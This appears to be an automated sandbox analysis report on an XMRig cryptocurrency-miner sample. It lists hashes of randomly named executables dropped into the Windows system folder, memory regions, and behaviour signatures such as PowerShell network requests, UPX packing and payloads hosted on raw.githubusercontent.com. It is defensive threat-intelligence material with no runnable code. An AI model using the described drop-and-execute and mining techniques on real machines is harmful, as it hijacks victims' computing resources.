\Windows\system\mRjzGeY.exe

MD5 ab6df50c0935603c7f84e8d82ae5e04f
SHA1 c26adc6951587e465d60ec392c0e9fcac40fff91
SHA256 671eac1d9ec72417a8f49d53a959b83d9acd683268ea62914d8e066edf224c2d
SHA512 7d06474a73b0e8e044d346e2c8aad13363fd9dc13bdd125967b9decdd700102e58cdd4791d0fbdfd42fadeaf19bd40035927c68254c7bf8189b8eef3c12c6ed8

\Windows\system\nePTOUp.exe

MD5 dae87a384106513930eed3e59f227bbc
SHA1 da18b1a5d57635dea223736c09c4ec9c2c2ae1b9
SHA256 cd02cf614d49aa59c71eeaf1f79b308edd9dda195d3a29c59606bdfc6c528ad3
SHA512 334e934ec89b9ac1d2d233df543e1125fdca9b1b41a5151e0b0c232b2a6ae7008dd7ea75423e27071f302b203b362529e7eb1a2a51825b03505a6e7ed68406a9

C:\Windows\system\gDnRKdI.exe

MD5 8c8a3139ea9e124bd167bb3e878890af
SHA1 570aa6d94df195c77162ffae5967363c0045c2e4
SHA256 0105fda53378b8baa7dfe537a657f0a051f071cf06f569690761ff7964184613
SHA512 f752735f2c08af2e35775e68483436e29a13005539b766ba12556045283518c84053b5bf2e77bb3537b11cbcc6a846a3fab9a6b0ff0be6e71fd2bdc27364dba7

\Windows\system\mvkeQJk.exe

MD5 f413136c54ff2575ce76095cf2bd2d4b
SHA1 3c19affabf302e5f8d229719759af54894cb40a7
SHA256 90cee3659af6cec04f4b84b1c1b378f8ec5a8b2a29b11c1436a522b90246c753
SHA512 c87a367da90fd8bff3b27b0f5ac09aff9582d4db21b110629644e20b3759dd7bd4db9f6792301d1fb93b55e089c170db86b75c8f814d602be32afe9ad346a5ba

memory/1248-64-0x000000013FDF0000-0x00000001401E2000-memory.dmp

memory/2148-69-0x000000013F450000-0x000000013F842000-memory.dmp

memory/2596-40-0x000000013F7D0000-0x000000013FBC2000-memory.dmp

memory/2740-81-0x00000000036D0000-0x0000000003AC2000-memory.dmp

memory/2772-87-0x000000013FD40000-0x0000000140132000-memory.dmp

\Windows\system\IbfJoAi.exe

MD5 3b5e55aafbd5223a56744bdeed4781b7
SHA1 f4c49e571786e6d49f11a85b8c077e9fed0ca2dd
SHA256 1a4cc5156bc4b1e751012faff5e3d5a0129dd6b557cc5ec96f85cebe8993407c
SHA512 0f7a40a24cb7d06f4c8040209b634e7e333da3a08be7e752fc4f277015b664e0f9fa097b6ee2038c0bf33fe772005f7a236830d04fab5a58c9e007e79fa6b214

C:\Windows\system\vacYWcB.exe

MD5 3ddd8c483e3f6982d4b785233f42de27
SHA1 6c0065f38417aac4d25fe5f84a2614ad6a40a516
SHA256 eb97d801c6dfbd6233948c1b34361786456355d64619b5432cd26f507de5c435
SHA512 0eee20f47ce94868853375b54de2ae4439241ff99de457cd3d4bd6f1ad790fa38a3ea4307c1d269c323f97ce77b394e1986719a24ce7e146b3a6e6855247f354

C:\Windows\system\VMfmXYJ.exe

MD5 c0e8b285b662abd6452cfbdcd72efeeb
SHA1 67628cbd2a557dacf2a7fa3e47b1bf2e1769e943
SHA256 3b33e0dfda7c5ebb4918f2cc162366c7622fd4922a39abc72d3a627be5ee8b15
SHA512 b86d681cc20ea64768cbc823ecb7da5c1f8188c07728b1bedc353ef2b17340a417f30c28cfa8baacd80dd91620ada89916876a7bcc61ee125ffbfc3d6a5cce45

memory/2204-367-0x00000000027D0000-0x00000000027D8000-memory.dmp

memory/2740-374-0x0000000003100000-0x00000000034F2000-memory.dmp

memory/2740-373-0x0000000003100000-0x00000000034F2000-memory.dmp

memory/2596-515-0x000000013F7D0000-0x000000013FBC2000-memory.dmp

memory/1280-516-0x000000013F0B0000-0x000000013F4A2000-memory.dmp

memory/2692-1262-0x000000013F440000-0x000000013F832000-memory.dmp

C:\Windows\system\AxjuPwF.exe

MD5 b957570b903e0c2514e2ad1ead4c8f81
SHA1 f8f497b4f00f0a0ff945fd81e0b476bf3c47a74f
SHA256 e2b3b663da1a02fa7a467c201c34b302bf8704737f8ef01a65536747c1f7b8c3
SHA512 0142da56fe2c96ce1561606c99361142c3bbe63a3153ffd54c2c208805bce6bbe1dac6f3e87fe83f5d3ea5af0718f2f0adf4fa232d904962196aea74d2c0cf81

C:\Windows\system\HLarVWJ.exe

MD5 bb1054e4b28d302be8d7ea89de91af88
SHA1 1945fd9faa24a626b5b0979167e9c032898b4cfa
SHA256 df1d087ae47f87a6434762bb7bab906694dbfa4284c2ee4126061ca8f2d97ba8
SHA512 574aaf27fbd784a54f72960030c3821cdc0968c0b9af3a3814ff460416cf609d2c6996574167171b341ebe5fb850dea06f641404da9db59fe38fd6cbd2427037

C:\Windows\system\fahgDuQ.exe

MD5 6d9f7119efe41ac76b6c3ec495f54b3f
SHA1 a6cfcf2d32e601f714e3827cf90e24fdddfbe20f
SHA256 ef1452d4e2135e88ea46f42247f813b01ff76383921b660d0f39167680eb93d0
SHA512 14c55f4e544fc1d803826a8c6abbe6d761fad8b302028d829fea2ee812e7a97f6938aa6810dba25288ce1e325475e5579a1e7a6bd4b0774ae6edf6a5ff66feb3

C:\Windows\system\sSnOXqD.exe

MD5 a256d6b810fb77d72e530d10ad05c2ab
SHA1 d518a7381f41a201d8db46bd1ad608e317a3937e
SHA256 f5a1291ab45ff7ba3c7cf89e31e0506906f27046d0974ffb86eb288a76230a24
SHA512 7a416a3814f81729f5116dc864ad015b9e4dab0488bafc1fae2e5b4a97d16792df455a7e5d561084f80bd2f2eea2084775793197e6deb2557270bf3390eae98d

C:\Windows\system\vXLthvm.exe

MD5 1b637b8735af5e4d90247cc731886c37
SHA1 fbbc9f355aa270a8c7a08373a6d8f8f49acd256d
SHA256 4b11c7f9b5a6c58c9b5dc49c5f768f5edc938f1a14fea554d8cbe1fc585aa756
SHA512 bc7a12d7622c98336ab88159106477d3fd4b41dd8f347053a6391bc229bb022b97fd9c79e517365841ce607f430980c0a8948bf155c62cc66c06365a39c5bd26

C:\Windows\system\AErWwdQ.exe

MD5 05cb1a3b88e167a1ce6aedac5206de45
SHA1 1c8f1458e152d7f61e41a039cfb8d9725f5f0fec
SHA256 12b322be8c58f962230c2ea5fdcb0c3ecadd4d5bfecaa02c9ce452893e0eed80
SHA512 05ccb3f6fc00e5b0d0fc49fc1f628286265762430fa40415aee839913d5215d78fe933a3e59cddabb5c5b5db06c4417b0bc8132f7ddfaa818ba17602c586a109

C:\Windows\system\JEhxEtO.exe

MD5 9c2f2c5f155e8c1ff64468493cad895d
SHA1 c6528ba5721aaa19d26d82f58f16b1a2e24dc288
SHA256 c1917417b9a690789003e2e3edf83b68c53ddc0ee71809cf12baf44b9c90eee4
SHA512 b4e8d1179f419218be6ba51ab10ab8df3e33ff0391cbb24b5bbf29d1869899d78f6350ae89b5a4a43519094e4ffe4691c5b0de570f9c96d4680df0c61494be83

C:\Windows\system\BkAAeHt.exe

MD5 68997e0304df2d5cddae8648ecc592ae
SHA1 ca5ff51109e7e9a89df4cd0b3706d907ccceb366
SHA256 90c03b96ac32a79fb15beb251deca1143f59ec404aab4db999384eec194bc4c4
SHA512 33091c42fb914e243a281d85ca5d8b4bcef4e207573e6496b19a7a1489f839ef22aa2e8f88d87bbfceb61be83098a341a16a321f4afb88ea5c5ffa4be9bad7d9

C:\Windows\system\kfdPmuM.exe

MD5 e6ced2f750d25c0cbc2b8e8f2df9ea7a
SHA1 b254727ae18ae948c1955e1bfff4284fcd9bece5
SHA256 a65db593df71fa9ac6efad00e6f85f4d19713fea99120bcaeab0bccefa9e6fd2
SHA512 276b9402cbfa681cd12d0ac3553da085dfc403f03621e77456623e5483b84e1a3ee40e75a3303bea124285f147583dfec393320d4ceb4151c2a87cebccaf9a11

C:\Windows\system\NmbSPRS.exe

MD5 7d9bd665ca4b3de0376da646c7d2e6bc
SHA1 52ca669e7839a6edec5c5437e9ffa82835401334
SHA256 dc1968ae77bb9934c17143ecadaa19f83911f2cfcf54c8aa1578a0a4093f86c5
SHA512 4887d04cbc39885b8d77f1ce26b600423a702fefef1580df4c1ad012ee7607b5b4d7648963dbf9283d58765e42410760516167502fef3d46e756f2bc318117d7

C:\Windows\system\DVbxxSN.exe

MD5 d1251d60fd9d73c7eaceca7a92972fac
SHA1 f45d0f6667e96b11760255c7ae3a88c8794b621f
SHA256 538a2a87b5d38ebdc322e139ffca3d67fc9cf51428ab6c2d49c81d4fe32ccf7b
SHA512 f94e22de0e75f4d3ee29540cc5fbd054b19ef6ec36a68ac5cfa956e5ef563f38e9e717286b41abbbd31fdae08b0a4034819207c873775e97ad6bd003fe624d8f

C:\Windows\system\qOkXlGW.exe

MD5 4607949b03ca15fbd5dbb3e0db29e49c
SHA1 8b8a81790c2c21331d54a5b27abc75eb613a4743
SHA256 ec2763bc4baddd5a177f5c6fb8a8a716f21fc7626af4cd8696d299eb8fc4795e
SHA512 6236f933fcb130f28eec0393ee9db2c382115c51079f3976a502904e199806b090f572e2e98310a8f22d757768bdff1905a2264b4cf7acce3893f9feb14d465f

C:\Windows\system\fjKnZXH.exe

MD5 db921b7473ecf33dd37a3f47c533187f
SHA1 6ef532f536ae701cb85f166f98c1475656d3f4a8
SHA256 391eb385699cab2f78267305af7806cd4701dd8f63446ab60d827e896523cc3c
SHA512 65573f4ec475bccb955f09048e550efb3a01f8013a169a86f79b9f9d97d7291e0aaa72cf951f373f0f3bb59f413ea430fed801bb8e12069c26139b2672391564

C:\Windows\system\tSMhgai.exe

MD5 d8c23a6687cd4c8b274d031d8d6c41c8
SHA1 1b1fdde009fe28d72cbe476e3b168ead35a2be71
SHA256 662d11aa96c239380196956b4cff24978bd057cf650056e769ab3c7f88fb864d
SHA512 c9d6376777deb579c29c81b84686490264d1f909bd7d998c8d75182f191c33ca75cf6e15b266e9533a787c4ec8a70129f737871408c8b6c02053075f6849a002

C:\Windows\system\IrKNUgf.exe

MD5 fc069f53455d7e0940bf9cc6d23cdee4
SHA1 c5d5490e2bc017dcab3bb46e4f17006915754690
SHA256 c46fb3c168e1a09dc7efc37b7ccf69503fb439a59561aa706caf7d856e16dae6
SHA512 ffe541e5b9b14cc079b0bd844ae808f95c0a3f2ab6a122270790c6123db6b862dfa320ecfb3b9ded68f5055ea8a5298ccddc6cf4feca5875f708beab71ead740

C:\Windows\system\bCeZwCM.exe

MD5 7522055fc8f68322ee717ffe4a63542b
SHA1 5b920f562451f63c29b4374c73ae29e0fda9ae9b
SHA256 7134547e61b203aa4f4f0e026db0672c6a426f01db56479bea6a1e8a1dbba483
SHA512 b1e19f94eaf2bd377a2fa26eff3c4440143e9762a11594f5ec696ed1943503dac59a702ef37c308901be875a7e6eb97b81de880f4fb012f61a8f8930a5b0b894

C:\Windows\system\wnGMRUL.exe

MD5 9647de7a14b686362c51dace90d5661a
SHA1 f88a0b0d57dec0a15c8dc5bb1a5c164cccb514c7
SHA256 a74f13a52798f6827d06cfe15916b45af78fa0df0f39588e2d228f2f5b2ec065
SHA512 3f7d177f716197fa53f614083464b988df143f0df2fef1bb1728936b3ec1e4f698b3e7082a9dbe1b51e40000f8435e00a0bf7b768ef927a55cdde4866ebc5d84

memory/1036-86-0x000000013F710000-0x000000013FB02000-memory.dmp

memory/2740-85-0x000000013FA80000-0x000000013FE72000-memory.dmp

C:\Windows\system\tSWdktZ.exe

MD5 617fc4ee6c5f2e8450e7e70b75b81969
SHA1 77fb93ae36c779277fa8dbab41e8178b0b6c57a4
SHA256 8e008277309631641b63ff393f199b24ab7dde85d0be6266f05325921d232c25
SHA512 d0a567958b27a4be1c91faa686b58aea4a7b54e1b14bcdaca91cee4e49c550e977da2097bd50e64236afc3940283c33d4d0cd68685df14a832ae0b2e3d4a6a0d

C:\Windows\system\jlBrfgi.exe

MD5 899f8b906f016a50e970536634ea0db1
SHA1 3f4307e63baffbc8ea390b892ec1084fb799249a
SHA256 c7d8b826067205850a18695a06d776e832fc714c68985101d335d98bf04589f5
SHA512 e5b6152ee44355f61f59149ec184107fbd26a7fa3195c237a29604961f81cd7983460c6bf31192575cbf2240231fd9eb6d677f7985ea6d15e2c50e182d57cb00

memory/2752-82-0x000000013FE10000-0x0000000140202000-memory.dmp

C:\Windows\system\NMqzNUh.exe

MD5 972fdab1c3ba305489cacf8af22d8bb3
SHA1 1fba6408d96e0b1ec66fbdd20e71de3a65340bb3
SHA256 31bb64e1a28fa67c254ef5b6b8098ace386f0720fd38ff797257a5221e452e0a
SHA512 b1aef4d235ca6092c3aea3a4faf78d52b1ef1cbfc3e3193228a6b8e26e1d468eb102dc18acf7e6bd144a55ef076e11306c9d61d3cd5b9474705bb41c8f73bd65

memory/2740-76-0x00000000036D0000-0x0000000003AC2000-memory.dmp

memory/2612-68-0x000000013F4E0000-0x000000013F8D2000-memory.dmp

memory/2552-66-0x000000013FDA0000-0x0000000140192000-memory.dmp

memory/2620-65-0x000000013F610000-0x000000013FA02000-memory.dmp

memory/2740-63-0x000000013F610000-0x000000013FA02000-memory.dmp

C:\Windows\system\lNneVmx.exe

MD5 fe693c0abebdb228046ff7c6ba011720
SHA1 e9ae5c81742bcbbebc22ede9fdc0e204783ca35d
SHA256 2bd1f4892a2b2cc9e3f86f33ed71acd559c761c90e3bb890630e6589b159d1cb
SHA512 80b869ddeabdfcb568fa2ac79da51fe4496fb18a540314c4c0010984406e28c3caa985b719cfe4570e7f606a5ea8bcb7623e22c6ecdbe985841f96f038c2b818

memory/2204-62-0x000000001B660000-0x000000001B942000-memory.dmp

memory/2740-61-0x0000000003100000-0x00000000034F2000-memory.dmp

memory/2740-55-0x000000013F4E0000-0x000000013F8D2000-memory.dmp

memory/2740-54-0x0000000003100000-0x00000000034F2000-memory.dmp

C:\Windows\system\WqdnKms.exe

MD5 8bde0aebe5ccf7a617d35aff62f90e29
SHA1 e0b30e6c1c020bcd5d46fa643f57bebd4552ec6a
SHA256 d0bdd5a7c13cbac586dbe425d757b08a9c1314fcd510ec53bebd2d18bb1b35cf
SHA512 2126fbebba7a02f0a9e9a1be33bafd000a7b12c545a332ce661914bdd7d3ba88de6178d560a03f2e9954aad8ac131d0b2fccaa635628889865a06141f68b997e

C:\Windows\system\mcMMfbL.exe

MD5 6446ea9d32d343c458ab6fb7eb2f2499
SHA1 9e9947bcc7f64bea4c1f4eb76fafaf185f7aab0f
SHA256 bc45f0dde78f3b20fcdfe53712d35f171fa596225862c98ad3c96da8f1a6b83e
SHA512 028c63ffcbdf8dc81f4baa47f41a7fe36be41b1e249a07ac7352dba9f4414469d06153af903b2d63cf0342b29fe2b9c70347d0870e65b763b8e927e9d594665a

memory/2740-50-0x000000013F450000-0x000000013F842000-memory.dmp

memory/1280-48-0x000000013F0B0000-0x000000013F4A2000-memory.dmp

memory/2692-46-0x000000013F440000-0x000000013F832000-memory.dmp

memory/2740-45-0x000000013F0B0000-0x000000013F4A2000-memory.dmp

C:\Windows\system\rintTog.exe

MD5 29d677c65ee84dfbcb736a41679491b2
SHA1 b9357e351a33303b3d32d81683d72d48a83530e0
SHA256 f0482afc2fd65d1b73fd1323645e58f09db8cf8354a50866cfc5c3fc63c977ae
SHA512 0ddd0f489bfc7d8b6241d20c8d8a73558de8b139d1402c4fd87c1019bdd7d3572ec8b967e9dc5e66772f1c157fa7b1f50fee46bfd14c65c5aac3fc29389643c0

memory/2636-10-0x000000013F9A0000-0x000000013FD92000-memory.dmp

memory/2740-20-0x0000000003100000-0x00000000034F2000-memory.dmp

memory/2740-0-0x00000000000F0000-0x0000000000100000-memory.dmp

memory/2620-6046-0x000000013F610000-0x000000013FA02000-memory.dmp

memory/1280-6051-0x000000013F0B0000-0x000000013F4A2000-memory.dmp

memory/2636-6056-0x000000013F9A0000-0x000000013FD92000-memory.dmp

memory/2552-6052-0x000000013FDA0000-0x0000000140192000-memory.dmp

memory/2692-6048-0x000000013F440000-0x000000013F832000-memory.dmp

memory/1248-6047-0x000000013FDF0000-0x00000001401E2000-memory.dmp

memory/2752-6069-0x000000013FE10000-0x0000000140202000-memory.dmp

memory/2772-6068-0x000000013FD40000-0x0000000140132000-memory.dmp

memory/2596-6067-0x000000013F7D0000-0x000000013FBC2000-memory.dmp

memory/2612-6080-0x000000013F4E0000-0x000000013F8D2000-memory.dmp

memory/1036-6081-0x000000013F710000-0x000000013FB02000-memory.dmp

memory/2148-6095-0x000000013F450000-0x000000013F842000-memory.dmp

memory/2740-11425-0x00000000036D0000-0x0000000003AC2000-memory.dmp

memory/2740-11404-0x00000000036D0000-0x0000000003AC2000-memory.dmp

memory/2740-11831-0x00000000036D0000-0x0000000003AC2000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-03 10:33

Reported

2024-06-03 10:36

Platform

win10v2004-20240508-en

Max time kernel

147s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\GKHCzdr.exe N/A
N/A N/A C:\Windows\System\CoMgIai.exe N/A
N/A N/A C:\Windows\System\zyXfriu.exe N/A
N/A N/A C:\Windows\System\OBojKMl.exe N/A
N/A N/A C:\Windows\System\vNWObaP.exe N/A
N/A N/A C:\Windows\System\sDswrCJ.exe N/A
N/A N/A C:\Windows\System\KdjDDca.exe N/A
N/A N/A C:\Windows\System\SBaVbgy.exe N/A
N/A N/A C:\Windows\System\nYlrigx.exe N/A
N/A N/A C:\Windows\System\ajTYFtv.exe N/A
N/A N/A C:\Windows\System\PoOEMbd.exe N/A
N/A N/A C:\Windows\System\pCcNHhi.exe N/A
N/A N/A C:\Windows\System\wDbcVmk.exe N/A
N/A N/A C:\Windows\System\tnljfwT.exe N/A
N/A N/A C:\Windows\System\BpHuLGd.exe N/A
N/A N/A C:\Windows\System\HGyDuGS.exe N/A
N/A N/A C:\Windows\System\YZWJfzb.exe N/A
N/A N/A C:\Windows\System\gDgROHK.exe N/A
N/A N/A C:\Windows\System\frImnwz.exe N/A
N/A N/A C:\Windows\System\vEyZGhR.exe N/A
N/A N/A C:\Windows\System\qxshGxQ.exe N/A
N/A N/A C:\Windows\System\vAgduTt.exe N/A
N/A N/A C:\Windows\System\jqHxNAo.exe N/A
N/A N/A C:\Windows\System\pJzRuRL.exe N/A
N/A N/A C:\Windows\System\UDpCFKf.exe N/A
N/A N/A C:\Windows\System\ekihYSz.exe N/A
N/A N/A C:\Windows\System\TXJGqwi.exe N/A
N/A N/A C:\Windows\System\oPvzoLm.exe N/A
N/A N/A C:\Windows\System\VUMTidr.exe N/A
N/A N/A C:\Windows\System\xxTgzuw.exe N/A
N/A N/A C:\Windows\System\xaWHwGg.exe N/A
N/A N/A C:\Windows\System\JijMgKD.exe N/A
N/A N/A C:\Windows\System\cZfDXoF.exe N/A
N/A N/A C:\Windows\System\tPLIxpZ.exe N/A
N/A N/A C:\Windows\System\lCYALnO.exe N/A
N/A N/A C:\Windows\System\gifsCAn.exe N/A
N/A N/A C:\Windows\System\DMKcRie.exe N/A
N/A N/A C:\Windows\System\PNrobFp.exe N/A
N/A N/A C:\Windows\System\RGDkWCe.exe N/A
N/A N/A C:\Windows\System\KQiZcSz.exe N/A
N/A N/A C:\Windows\System\qOWmApF.exe N/A
N/A N/A C:\Windows\System\eqVYTsw.exe N/A
N/A N/A C:\Windows\System\rlqOnpU.exe N/A
N/A N/A C:\Windows\System\BiZjoov.exe N/A
N/A N/A C:\Windows\System\XgzCMaW.exe N/A
N/A N/A C:\Windows\System\TLeRWwG.exe N/A
N/A N/A C:\Windows\System\UmRvyTt.exe N/A
N/A N/A C:\Windows\System\qRSFXeP.exe N/A
N/A N/A C:\Windows\System\jemVRrs.exe N/A
N/A N/A C:\Windows\System\vdvhmGz.exe N/A
N/A N/A C:\Windows\System\QKAeEOG.exe N/A
N/A N/A C:\Windows\System\HvvJxLz.exe N/A
N/A N/A C:\Windows\System\RdMeMsF.exe N/A
N/A N/A C:\Windows\System\LrjsTiX.exe N/A
N/A N/A C:\Windows\System\eEaFgHu.exe N/A
N/A N/A C:\Windows\System\yMNQkwR.exe N/A
N/A N/A C:\Windows\System\VZnDVWO.exe N/A
N/A N/A C:\Windows\System\bCiGAcl.exe N/A
N/A N/A C:\Windows\System\lOACykL.exe N/A
N/A N/A C:\Windows\System\ejmpjYS.exe N/A
N/A N/A C:\Windows\System\FaKtWoh.exe N/A
N/A N/A C:\Windows\System\bOyFWWY.exe N/A
N/A N/A C:\Windows\System\tMVvksK.exe N/A
N/A N/A C:\Windows\System\LVDBgCy.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\rqmLrfw.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\BxZjfWq.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\lKNjZQK.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\gzmOyCw.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\gqAoAYr.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\eNKGeXG.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\pybVDNM.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\vLGdcxt.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\MYqRJJU.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\LuJFVfH.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\PDKwPch.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\qTQNBoB.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\MCWgJgG.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\iwkflsO.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\ffFlSrY.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\FHOGMsq.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\OaOWWNg.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\FSSqPfa.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\ooVTkxO.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\GyMlLmn.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\piclRQx.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\YkhwQGl.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\oPmKVsf.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\mPXOkth.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\LJSVwdR.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\PyNlAsC.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\JnrcllW.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\jiSEscn.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\sXOHZJz.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\cZfDXoF.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\AwDKBim.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\FUGxdak.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\EdeYMMj.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\gDKCntz.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\yEmmhxT.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\cfdRuYb.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
File created C:\Windows\System\PaiSUIU.exe C:\Users\Admin\AppData\Local\Temp\a038c1d35987684947288bb8c86f0670_NeikiAnalytics.exe N/A
